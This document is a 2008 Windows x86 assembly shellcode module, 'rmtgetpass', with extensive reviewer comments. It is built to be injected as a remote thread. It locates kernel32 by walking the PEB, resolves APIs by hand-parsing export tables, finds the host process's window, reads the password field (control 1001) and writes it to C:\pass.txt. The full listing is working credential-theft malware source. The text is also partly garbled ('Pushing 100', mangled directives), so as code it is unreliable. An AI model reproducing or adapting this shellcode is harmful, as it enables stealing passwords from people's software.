The main body of the shellcode is as follows:
; Module: rmtgetpass. ASM
; Get password by injecting remote thread
; 29-nov-2008 created by benyanwk
; Write This shellcode is a hard work
; So I search the book for a more resonable
; Method
; Two method:
; (1) Using DLL file to inject
; (2) using advance shellcode Technique
; Shocould make a revision
; Assembler directives: 32-bit flat model, stdcall default convention,
; case-sensitive symbols. NOTE(review): the stray spaces in ". 386" and
; ". Model" read like a transcription artifact of the usual dotted directives.
. 386
. Model flat, stdcall
Option Casemap: None
;/////////////////////////////////
; // Struct Definition
;////////////////////////////////
; Local mirror of the PE IMAGE_EXPORT_DIRECTORY layout (40 bytes).
; Getapiaddr below reads only Nbase, Addressoffunctions, Addressofnames and
; Addressofnameordinals; the remaining fields are kept so offsets line up.
Image_export_directory struct
Characteristics DWORD?                  ; unused here
Timedatestamp DWORD?                    ; unused here
Majorversion word?                      ; unused here
Minorversion word?                      ; unused here
Nname DWORD?                            ; RVA of the module name; unused here
Nbase DWORD?                            ; ordinal base, subtracted in Getapiaddr
Numberoffunctions DWORD?                ; unused here
Numberofnames DWORD?                    ; unused here -- Getapiaddr never bounds its name scan with it
Addressoffunctions DWORD?               ; RVA of the export address table (DWORD RVAs)
Addressofnames DWORD?                   ; RVA of the name pointer table (DWORD RVAs, sorted)
Addressofnameordinals DWORD?            ; RVA of the name ordinal table (WORDs)
Image_export_directory ends
; Parameter block handed to Enumproc through EnumWindows' lParam.
; Enumproc reads it by raw offset ([EBX], [EBX+4], [EBX+8]) instead of
; through [EBP+...] because EBP's relocation delta is not valid inside the
; callback; keep the field order in sync with those offsets.
St_param struct
Apiaddress DWORD?                       ; +0: resolved GetWindowThreadProcessId
Pid dword?                              ; +4: PID to match (GetCurrentProcessId result)
Phwnd DWORD?                            ; +8: where Enumproc stores the matching HWND
St_param ends
;////////////////////////////////////
; // Externs
;///////////////////////////////////
; Code segment; note the data block is deliberately emitted inside the
; proc after the code (see the "Data definition" comment below).
. Code
;-----------------------------------------------------------------------
; _Rmtgetpass(lparam)  -- stdcall, one DWORD argument (unused in the body);
; per the file header presumably used as a remote thread start routine.
; Self-contained position-independent body: resolves every API it needs by
; walking the PEB loader list (FS:[30h]) and parsing the kernel32 export
; table (Getapiaddr), enumerates top-level windows for one owned by the
; current process (Enumproc), reads the text of dialog item IDC_PASS (1001)
; with GetWindowTextA and writes the 100-byte buffer to a file opened with
; CREATE_ALWAYS (CreateFileA/WriteFile).
; Register roles: EBP = relocation delta, so every [EBP + label] below
; addresses the data block wherever the bytes were copied; EAX/ECX/EDI/ESI/
; EBX are scratch around the API calls.
; Points an analyst can key on: the FS:[30h] PEB walk, manual export-table
; parsing, GetDlgItem/GetWindowTextA against a foreign window, and the
; CreateFileA/WriteFile drop of the window text.
;-----------------------------------------------------------------------
_ Rmtgetpass proc lparam: DWORD
; Get the password by remote thread
; Using shellcode Programming
;//////////////////////////////
; // Shellcode's code
;//////////////////////////////
; First get the relocation difference
; call/pop idiom: EBP = (runtime address of Rebase) - (link-time offset of
; Rebase), i.e. the delta between where the code was assembled and where
; it actually runs. Every data reference below goes through this delta.
Call rebase
Rebase:
Pop EBP; EBP = runtime address of Rebase
Sub EBP, offset rebase; EBP = relocation delta
; Get the kernel32.dll's base address
; By peb direct access
; Place in here not routine
; Because we need it after
Assume FS: nothing;
MoV eax, FS: [30 h]; TEB.ProcessEnvironmentBlock -> PEB
MoV eax, [eax + 0ch]; PEB.Ldr -> PEB_LDR_DATA
MoV eax, [eax + 1ch]; PEB_LDR_DATA.InInitializationOrderModuleList.Flink (1st entry)
MoV eax, [eax]; Flink -> 2nd entry of the init-order list
MoV eax, [eax + 08 h]; DllBase of that entry, taken to be kernel32
; NOTE(review): assumes kernel32 is the second module in initialization
; order; that ordering is a property of the Windows version being run on,
; not something the code verifies.
MoV [EBP + dwbase], eax; cache the module base for all later lookups
MoV ECx, eax; ECX = module base, argument to Getapiaddr
; Get the two key API's address
; Getapiaddr(EDI = name, ECX = base) returns the export's RVA in EAX;
; the module base is added afterwards to form the VA.
Lea EDI, [EBP + sgetprocaddress]; EDI -> "getprocaddress" (exact-byte compare, see Getapiaddr)
Lea eax, [EBP + getapiaddr]; relocated address of the local resolver
Call eax;
Add eax, [EBP + dwbase]; RVA -> VA
MoV [EBP + pgetprocaddress], eax;
Lea EDI, [EBP + sloadlibrary]; EDI -> "loadlibrarya"
Lea eax, [EBP + getapiaddr];
MoV ECx, [EBP + dwbase]; Getapiaddr clobbered ECX, so pass the base again
Call eax;
Add eax, [EBP + dwbase]; RVA -> VA
MoV [EBP + ploadlibrary], eax;
; Get other API's address
; From here on the real GetProcAddress(hModule, lpProcName) is used
; (stdcall: lpProcName pushed first, then hModule).
Lea eax, [EBP + swritefile];
Push eax; lpProcName
Push [EBP + dwbase]; hModule = kernel32
Call [EBP + pgetprocaddress];
MoV [EBP + pwritefile], eax;
Lea eax, [EBP + screatemailslot];
Push eax;
Push [EBP + dwbase];
Call [EBP + pgetprocaddress];
MoV [EBP + pcreatemailslot], eax        ; resolved but never called in this body
Lea eax, [EBP + screatefile];
Push eax;
Push [EBP + dwbase];
Call [EBP + pgetprocaddress];
MoV [EBP + pcreatefile], eax;
Lea eax, [EBP + sgetcurrentprocessid];
Push eax;
Push [EBP + dwbase];
Call [EBP + pgetprocaddress];
MoV [EBP + pgetcurrentprocessid], eax;
Lea eax, [EBP + sexitthread];
Push eax ;; lpProcName
Push [EBP + dwbase];
Call [EBP + pgetprocaddress];
MoV [EBP + pexitthread], eax; resolved but never called; the body ends with a plain ret
Lea eax, [EBP + ssleep];
Push eax;
Push [EBP + dwbase];
Call [EBP + pgetprocaddress];
MoV [EBP + psleep], eax; resolved but the only call site below is commented out
; LoadLibraryA("user32.dll") -> dwbase2; the user32 APIs are then resolved
; with GetProcAddress against that handle.
Lea eax, [EBP + susrdll];
Push eax; lpLibFileName
Call [EBP + ploadlibrary];
MoV [EBP + dwbase2], eax; user32 base (not checked for NULL)
Lea eax, [EBP + sgetwindowthreadprocessid];
Push eax;
Push [EBP + dwbase2];
Call [EBP + pgetprocaddress];
MoV [EBP + pgetwindowthreadprocessid], eax ; later handed to Enumproc via St_param
Lea eax, [EBP + sgetwindowtext];
Push eax;
Push [EBP + dwbase2];
Call [EBP + pgetprocaddress];
MoV [EBP + pgetwindowtext], eax;
Lea eax, [EBP + sgetdlgitem];
Push eax;
Push [EBP + dwbase2];
Call [EBP + pgetprocaddress];
MoV [EBP + pgetdlgitem], eax;
Lea eax, [EBP + senumwindows];
Push eax;
Push [EBP + dwbase2];
Call [EBP + pgetprocaddress];
MoV [EBP + penumwindows], eax;
; Get the process ID
Call [EBP + pgetcurrentprocessid];
MoV [EBP + dwpid], eax; PID of the process this code is running in
; Get the target's window p
; Fill St_param {Apiaddress, Pid, Phwnd} for the EnumWindows callback.
MoV eax, [EBP + pgetwindowthreadprocessid];
Lea ESI, [EBP + stparam];
Assume ESI: PTR st_param;
MoV [esi]. apiaddress, eax; callback calls this to get each window's PID
MoV eax, [EBP + dwpid];
MoV [esi]. PID, eax; PID the callback matches against
Lea eax, [EBP + hwnd];
MoV [esi]. phwnd, eax; callback writes the matching HWND here
; EnumWindows(lpEnumFunc, lParam): lParam pushed first, then the callback.
Push ESI; lParam = &stparam
Lea eax, [EBP + enumproc]; enumwindowsproc (relocated)
Push eax;
Call [EBP + penumwindows];
; We need the enumproc finished
; To make sure that we get the hwnd
; Wait for 1 sec
; Push 1000;
; Call [EBP + psleep];
; (EnumWindows only returns after the enumeration has finished, so the
; commented-out Sleep would not add anything.)
; Get the dialog item
; GetDlgItem(hwnd, IDC_PASS) -> EAX = control handle (NULL not checked)
Push idc_pass;
Push [EBP + hwnd];
Call [EBP + pgetdlgitem];
; Get the window's password
; GetWindowTextA(hCtrl, pass, 99): 99 leaves room for the NUL in the 100-byte buffer
Push 99;
Lea EBX, [EBP + pass];
Push EBX;
Push eax;
Call [EBP + pgetwindowtext];
; CreateFileA(sfile, 3, 3, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)
; -- arguments pushed right to left.
Push 0; hTemplateFile
Push 80 h; file_attribute_normal
Push 2; create_always (truncates an existing file)
Push 0; lpSecurityAttributes
Push 00000003 h; dwShareMode = file_share_read | file_share_write
Push 00000003 h; dwDesiredAccess = file_read_data | file_write_data (3), NOT generic_read | generic_write (0C0000000h)
Lea eax, [EBP + sfile];
Push eax;
Call [EBP + pcreatefile];
; WriteFile(hFile, pass, 100, &hwnd, NULL); EAX (the handle) is not tested
; against INVALID_HANDLE_VALUE and is never closed.
Push 0; lpOverlapped
Lea ECx, [EBP + hwnd]; lpNumberOfBytesWritten -- reuses the hwnd slot, which is no longer needed, as the out-param
Push ECx;
Pushing 100; nNumberOfBytesToWrite = whole 100-byte buffer, regardless of text length (mnemonic looks like a transcription artifact)
Lea ECx, [EBP + pass];
Push ECx;
Push eax; hFile
Call [EBP + pwritefile];
MoV eax, 0; thread exit code 0
Add ESP, 4; NOTE(review): presumably discards the saved EBP pushed by the MASM-generated prologue -- confirm against the assembled bytes
DB 0c3h; raw ret, bypassing the generated epilogue and the RET after the data block
;///////////////////////////////
; // Data definition
;//////////////////////////////
;
; Data definition shocould be placed here
; After the code
; Because we need to code at the first
; So the exported symbol cocould be used
; As proc pointer correctly
; All of this is addressed as [EBP + label]; it is never executed.
Hwnd dd?                                ; set by Enumproc; later reused as WriteFile's bytes-written out-param
Dwpid dd?                               ; GetCurrentProcessId result
Pass dB 100 DUP (?)                     ; GetWindowTextA destination; all 100 bytes are written to the file
Idc_pass equ 1001                       ; dialog control id read with GetDlgItem
Dwbase dd?                              ; kernel32 base from the PEB walk
Dwbase2 dd?                             ; user32 base from LoadLibraryA
Pgetprocaddress dd?
Ploadlibrary dd?
Susrdll DB "user32.dll", 0
Skrldll DB "kerne32.dll", 0             ; never referenced by the code above
; Export names compared byte-for-byte by Getapiaddr (GetProcAddress/
; LoadLibraryA) or passed to the real GetProcAddress (the rest).
Sgetprocaddress DB "getprocaddress", 0
Sloadlibrary DB "loadlibrarya", 0
Senumwindows DB "enumwindows", 0
Sgetwindowtext DB "getwindowtexta", 0
Sgetwindowthreadprocessid DB "getwindowthreadprocessid", 0
Sgetdlgitem DB "getdlgitem", 0
Screatefile DB "createfilea", 0
Swritefile DB "writefile", 0
Screatemailslot DB "createmailslota", 0 ; resolved, not used
Sexitthread DB "exitthread", 0          ; resolved, not used
Sgetcurrentprocessid DB "getcurrentprocessid", 0
Ssleep DB "Sleep", 0                    ; resolved, call site commented out
Pcreatefile dd?
Pgetcurrentprocessid dd?
Pcreatemailslot dd?
Pexitthread dd?
Pgetwindowthreadprocessid dd?
Pgetwindowtext dd?
Pgetdlgitem dd?
Penumwindows dd?
Pwritefile dd?
Psleep dd?
Sfile DB "C: // pass.txt", 0             ; output path handed to CreateFileA (string kept as published)
Stparam st_param <>                     ; parameter block for Enumproc
; Unreachable: control left through the raw ret above, before the data.
RET
_ Rmtgetpass endp
;-----------------------------------------------------------------------
; Getapiaddr -- resolve an export by name from the module in [EBP + dwbase]
; In:    EDI = NUL-terminated export name (compared byte-for-byte, case-sensitive)
;        ECX = module base (used only for the PE header walk; all later
;              RVA->VA translations use [EBP + dwbase], so this only works
;              for the module cached there)
;        EBP = relocation delta set by the caller
; Out:   EAX = RVA of the export (caller adds the base)
; Clobb: EAX, EBX, ECX, ESI, EDI, flags; stack is balanced on return
; Not a proc: reached via Call eax from _Rmtgetpass, returns with RET.
; The name scan has no upper bound (Numberofnames is not consulted); a
; name that is absent makes it walk past the end of the table.
;-----------------------------------------------------------------------
Getapiaddr:
; Get kernel32.dll's API address
; Pass argument using EDI
; EDI point to the API name
; ECx pass the kernel base address
; JMP to export directory table
MoV eax, ECx; get the kernel address
Add eax, [eax + 3ch]; base + e_lfanew -> PE signature
MoV eax, [eax + 78 H]; DataDirectory[0].VirtualAddress (export directory RVA, PE32 layout)
Add eax, ECx; [VA] translate to VA
MoV ESI, eax
Push ESI; save export directory VA            (stack: [expdir])
Assume ESI: PTR image_export_directory
; JMP to name pointers array
MoV eax, [esi]. addressofnames; [RVA] The name pointers address
Add eax, [EBP + dwbase]; [VA] translate to VA
MoV EBX, eax; EBX walks the name pointer table, 4 bytes per entry
Push eax; save name table base                (stack: [names, expdir])
; Get the API names lengths
XOR ECx, ECx; clear the counter
Push ESI; keep the export directory while ESI scans the name (stack: [expdir, names, expdir])
MoV ESI, EDI;
Get_len:
INC ECx;
MoV Al, byte PTR [esi];
Inc esi;
Test Al, Al;
Jnz get_len; ECX = strlen(name) + 1 (includes the NUL)
Pop ESI; restore the export directory         (stack: [names, expdir])
; Search and match for the desired API
Push EDI; wanted-name pointer                 (stack: [name, names, expdir])
Push ECx; length including NUL                (stack: [len, name, names, expdir])
Find_name:
; cmpsb advances ESI/EDI and loopz consumes ECX, so both are reloaded from
; the stack at the top of every iteration.
Pop ECx; length including NUL
Pop EDI; wanted-name pointer
MoV ESI, [EBX]; [RVA] The name address
Add ESI, [EBP + dwbase]; [VA] translate to VA
Push EDI; protect the desried API name
Push ECx; protect the API name length;
@@:
Cmpsb; compare [ESI] (export name) with [EDI] (wanted name)
Loopz @ B; continue while equal and ECX > 0
; NOTE(review): ECX is 0 both after a full match and after a mismatch on
; the very last compared byte (the NUL), so a wanted name that is a prefix
; of an export name is also accepted here.
Test ECx, ECx
JZ find_addr;
Add EBX, 4; else, loop till match the name
JMP find_name;
Find_addr:
Pop EDI; drop saved length                    (stack: [name, names, expdir])
Pop EDI; drop saved name pointer              (stack: [names, expdir])
Pop eax; name table base                      (stack: [expdir])
Add EBX, 4; Increment
Sub EBX, eax; EBX = 4 * (index of matched entry + 1)
; JMP to the name ordinal table
Pop ESI; export directory                     (stack balanced)
MoV eax, [esi]. addressofnameordinals; [RVA] Name ordinals address
Add eax, [EBP + dwbase]; [VA] translate to base address
; Get the name ordinal
Shr ebx, 1; 4-byte name offset -> 2-byte ordinal offset
Add eax, EBX;
MoV ax, word PTR [eax]; 16-bit ordinal table entry (partial-register write)
And eax, 0000 ffffh; clear the high word
; Get the true ordianl
; NOTE(review): the PE spec defines name-ordinal entries as unbiased
; indexes into the address table; together with the +1 entry offset above
; this only lands on the matched name's slot under an assumption about how
; the module's ordinals are laid out -- verify on a live module.
Sub eax, [esi]. nbase;
; Get the address
SHL eax, 2; Mul by 4
MoV EBX, [esi]. addressoffunctions; [RVA] function addresses address
Add EBX, [EBP + dwbase]; [VA] translate to VA
Add EBX, eax;
MoV eax, [EBX]; EAX = export RVA (forwarded exports are not handled)
RET
;-----------------------------------------------------------------------
; Enumproc -- EnumWindowsProc(HWND hwnd, LPARAM lParam), stdcall
; lParam -> St_param {Apiaddress = GetWindowThreadProcessId, Pid, Phwnd}.
; Stores the first top-level window whose owning PID equals Pid into
; *Phwnd and returns FALSE (0) to stop the enumeration; otherwise returns
; TRUE (1) to continue. Preserves EBX; stack frame is hand-built, so the
; [esp + n] offsets below depend on the exact push order.
; EBP is not used here: the relocation delta is not valid inside a
; callback, which is why the parameters arrive through the struct.
;-----------------------------------------------------------------------
Enumproc:
; In SS segment you can also use DS segment data
; But the relocation will dead.
; So we need to pass
; (1) the API address
; (2) the target's PID as parameter to
; Function as a struct pointer
; Notice: This is a stdcall call Convention Function
Push EBX; callee-saved, restored before both returns
Sub ESP, 4; local DWORD to receive the window's PID
Push ESP; lpdwProcessId = &local   (push esp stores the pre-decrement value)
Push [esp + 10 h]; hWnd argument of this callback
MoV EBX, [esp + 18 h]; EBX -> St_param (lParam)
MoV eax, DS: [EBX]; St_param.Apiaddress = GetWindowThreadProcessId
Call eax; stdcall, pops its two arguments
MoV eax, [esp]; PID owning this window
CMP eax, DS: [EBX + 4]; compare with St_param.Pid
Jnz N;
MoV eax, [esp + 0ch]; current hwnd (the callback's own argument)
MoV ECx, [EBX + 8]; St_param.Phwnd
MoV DS: [ECx], eax; *Phwnd = hwnd
MoV eax, 0; return FALSE: stop enumerating
Add ESP, 4; release the local
Pop EBX;
Retn 8; pop hwnd and lParam
N:
Add ESP, 4; release the local
Pop EBX;
MoV eax, 1; return TRUE: keep enumerating
Retn 8;
; End of module; no entry point is named, so the program that carries this
; code must reference _Rmtgetpass, Getapiaddr and Enumproc itself.
End
Specific project files, please move to: http://bbs.pediy.com/showthread.php? T = 78032 download.